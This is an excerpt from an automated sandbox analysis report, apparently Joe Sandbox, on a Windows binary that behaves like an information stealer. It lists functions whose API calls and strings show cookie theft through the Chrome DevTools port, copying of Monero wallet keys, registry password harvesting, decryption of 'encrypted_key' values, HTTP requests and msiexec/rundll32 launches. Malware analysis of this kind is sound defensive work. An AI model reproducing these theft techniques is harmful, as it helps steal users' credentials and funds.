                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: d69fee559ed45f1bb3eb1052c1d94032cc9dfe847005728c316827fdbd4859df
                                  • Instruction ID: 4c2ea702489f26887d8dc94a4387ce23c3c05708c2a59a003cc9ac557e6a14db
                                  • Opcode Fuzzy Hash: d69fee559ed45f1bb3eb1052c1d94032cc9dfe847005728c316827fdbd4859df
                                  • Instruction Fuzzy Hash: 5A71D071914208EBDB14EFE4DC99FEEB778BF88700F108608F615A72A1DB74A905CB61
                                  Function 007F3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F3415
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F35AD
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 007F373A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: b54bbfae80b3d435e4f0e172428d6b25676496bb4d0756821adb3684be01e5b1
                                  • Instruction ID: fa50845d9b45337d606ed9a915fbeb4aef6007bbb35189401141957607886894
                                  • Opcode Fuzzy Hash: b54bbfae80b3d435e4f0e172428d6b25676496bb4d0756821adb3684be01e5b1
                                  • Instruction Fuzzy Hash: E812E2F191011CEACB14EB90DDA6FFD7739AF14300F004599E60A66291EF386B49CF65
                                  Function 007E9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007E9A50: InternetOpenA.WININET(00800AF6,00000001,00000000,00000000,00000000), ref: 007E9A6A
                                  • lstrcat.KERNEL32(?,cookies), ref: 007E9CAF
                                  • lstrcat.KERNEL32(?,008012C4), ref: 007E9CC1
                                  • lstrcat.KERNEL32(?,?), ref: 007E9CD5
                                  • lstrcat.KERNEL32(?,008012C8), ref: 007E9CE7
                                  • lstrcat.KERNEL32(?,?), ref: 007E9CFB
                                  • lstrcat.KERNEL32(?,.txt), ref: 007E9D0D
                                  • lstrlen.KERNEL32(00000000), ref: 007E9D17
                                  • lstrlen.KERNEL32(00000000), ref: 007E9D26
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 3174675846-3542011879
                                  • Opcode ID: 27d24fa49168042cdff4d5a95f51c2fb88612e8cc411f7031a54b12431ca3d30
                                  • Instruction ID: 3b1d69ab1ffafcbb28bad00e61a918ac24a190be8fc33a4252532b960a82a6bf
                                  • Opcode Fuzzy Hash: 27d24fa49168042cdff4d5a95f51c2fb88612e8cc411f7031a54b12431ca3d30
                                  • Instruction Fuzzy Hash: 72515FB2910508EBCB14EBE0DC99FEE7738AF48301F404658F219A7191EF785A49CF61
                                  Function 007F5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E62D0: InternetOpenA.WININET(00800DFF,00000001,00000000,00000000,00000000), ref: 007E6331
                                    • Part of subcall function 007E62D0: StrCmpCA.SHLWAPI(?,0145E350), ref: 007E6353
                                    • Part of subcall function 007E62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E6385
                                    • Part of subcall function 007E62D0: HttpOpenRequestA.WININET(00000000,GET,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E63D5
                                    • Part of subcall function 007E62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E640F
                                    • Part of subcall function 007E62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6421
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007F5568
                                  • lstrlen.KERNEL32(00000000), ref: 007F557F
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 007F55B4
                                  • lstrlen.KERNEL32(00000000), ref: 007F55D3
                                  • lstrlen.KERNEL32(00000000), ref: 007F55FE
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 56e05bcbc2a839414710c9ab5f183e7151f61a9963f438749f818735623a89d4
                                  • Instruction ID: 18686c98e5b4b57b47d669f556995997928f41e2dc64d0bf9c132c091bf34b22
                                  • Opcode Fuzzy Hash: 56e05bcbc2a839414710c9ab5f183e7151f61a9963f438749f818735623a89d4
                                  • Instruction Fuzzy Hash: 4A510CB061014CEBCB18FF64CDAAAFD777AAF50350F504458F60A57692EB386B05CB62
                                  Function 007F1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: d93b1c1d0eabe8eaaf3dea6730c950c596440176a7306ca9a543b1e90b36d6d6
                                  • Instruction ID: b25bce058c9ce227921797ee578ca0131e1ea4322c2ead0bf134c286618eeaaf
                                  • Opcode Fuzzy Hash: d93b1c1d0eabe8eaaf3dea6730c950c596440176a7306ca9a543b1e90b36d6d6
                                  • Instruction Fuzzy Hash: 00C182B590010DEBCB14EF60DC99FEE73B9AF54304F004599F609A7292EA74AA85CF91
                                  Function 007F44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F453C
                                  • lstrcat.KERNEL32(?,0145DD10), ref: 007F455B
                                  • lstrcat.KERNEL32(?,?), ref: 007F456F
                                  • lstrcat.KERNEL32(?,0145CDF0), ref: 007F4583
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007F8F20: GetFileAttributesA.KERNEL32(00000000,?,007E1B94,?,?,0080577C,?,?,00800E22), ref: 007F8F2F
                                    • Part of subcall function 007EA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007EA489
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                    • Part of subcall function 007F9550: GlobalAlloc.KERNEL32(00000000,007F462D,007F462D), ref: 007F9563
                                  • StrStrA.SHLWAPI(?,0145DBD8), ref: 007F4643
                                  • GlobalFree.KERNEL32(?), ref: 007F4762
                                    • Part of subcall function 007EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA23F
                                    • Part of subcall function 007EA210: LocalAlloc.KERNEL32(00000040,?,?,?,007E4F3E,00000000,?), ref: 007EA251
                                    • Part of subcall function 007EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA27A
                                    • Part of subcall function 007EA210: LocalFree.KERNEL32(?,?,?,?,007E4F3E,00000000,?), ref: 007EA28F
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F46F3
                                  • StrCmpCA.SHLWAPI(?,008008D2), ref: 007F4710
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007F4722
                                  • lstrcat.KERNEL32(00000000,?), ref: 007F4735
                                  • lstrcat.KERNEL32(00000000,00800FA0), ref: 007F4744
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 16210858246b6f4f1bc9dd16a674e9b11835bfccdab7c8918c260905312c7c75
                                  • Instruction ID: 06e2789a4f6b42b6f153eadefc079de73282de881016a72b39b55e3d6206a0b0
                                  • Opcode Fuzzy Hash: 16210858246b6f4f1bc9dd16a674e9b11835bfccdab7c8918c260905312c7c75
                                  • Instruction Fuzzy Hash: DD7147B6900208BBDF14EBF4DD59FEE7379AB88300F008598F605A6191DA78DB59CF51
                                  Function 007E1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E12B4
                                    • Part of subcall function 007E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 007E12BB
                                    • Part of subcall function 007E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E12D7
                                    • Part of subcall function 007E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E12F5
                                    • Part of subcall function 007E12A0: RegCloseKey.ADVAPI32(?), ref: 007E12FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 007E134F
                                  • lstrlen.KERNEL32(?), ref: 007E135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 007E1377
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 007E1465
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                  • DeleteFileA.KERNEL32(00000000), ref: 007E14EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: bde19de887107a7ad178eae8f550697ebe57dee5954bbb6c8cfa9193a10bc92c
                                  • Instruction ID: 98e9be42e9fe5706235eb6c25d0c073976bc6da3a09097543538bc588f9ecf17
                                  • Opcode Fuzzy Hash: bde19de887107a7ad178eae8f550697ebe57dee5954bbb6c8cfa9193a10bc92c
                                  • Instruction Fuzzy Hash: 215141F195011CABCB15EB60DD96EFD733DAB54300F4045D8B30E62192EE786B89CA66
                                  Function 007E9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(00800AF6,00000001,00000000,00000000,00000000), ref: 007E9A6A
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007E9AAB
                                  • InternetCloseHandle.WININET(00000000), ref: 007E9AC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$Open$CloseHandle
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 3289985339-2144369209
                                  • Opcode ID: 232dd5c3075f7409f361ac0b83502b8dc91d14737af829550ee85a6ae18310fb
                                  • Instruction ID: 92d8fb7eb2f2c009124863037fc583ca4b57cec6b5f860bbf3f9b1c0b729eef3
                                  • Opcode Fuzzy Hash: 232dd5c3075f7409f361ac0b83502b8dc91d14737af829550ee85a6ae18310fb
                                  • Instruction Fuzzy Hash: 94412075A11258EBCB14DF94DC99FED7774FB48740F104194F609AA291CBB8AE80CF60
                                  Function 007E7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007E7330: memset.MSVCRT ref: 007E7374
                                    • Part of subcall function 007E7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E739A
                                    • Part of subcall function 007E7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7411
                                    • Part of subcall function 007E7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 007E746D
                                    • Part of subcall function 007E7330: GetProcessHeap.KERNEL32(00000000,?), ref: 007E74B2
                                    • Part of subcall function 007E7330: HeapFree.KERNEL32(00000000), ref: 007E74B9
                                  • lstrcat.KERNEL32(00000000,0080192C), ref: 007E7666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007E76A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 007E76BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007E76EF
                                  • lstrcat.KERNEL32(00000000,00801934), ref: 007E7700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007E7733
                                  • lstrcat.KERNEL32(00000000,00801938), ref: 007E774D
                                  • task.LIBCPMTD ref: 007E775B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
